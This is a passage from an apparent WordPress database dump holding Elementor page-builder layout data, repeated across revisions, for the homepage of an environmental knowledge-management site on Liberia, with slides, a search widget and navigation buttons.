Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(28290,4078,'_elementor_version','3.4.0'),(28291,4078,'_elementor_template_type','wp-page'),(28292,4078,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(28294,4078,'_elementor_pro_version','3.3.6'),(28296,4079,'_wp_page_template','default'),(28297,4079,'_elementor_edit_mode','builder'),(28298,4079,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(28299,4079,'_elementor_version','3.4.0'),(28300,4079,'_elementor_template_type','wp-page'),(28301,4079,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(28303,4079,'_elementor_pro_version','3.3.6'),(28305,4080,'_wp_page_template','default'),(28306,4080,'_elementor_edit_mode','builder'),(28307,4080,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center 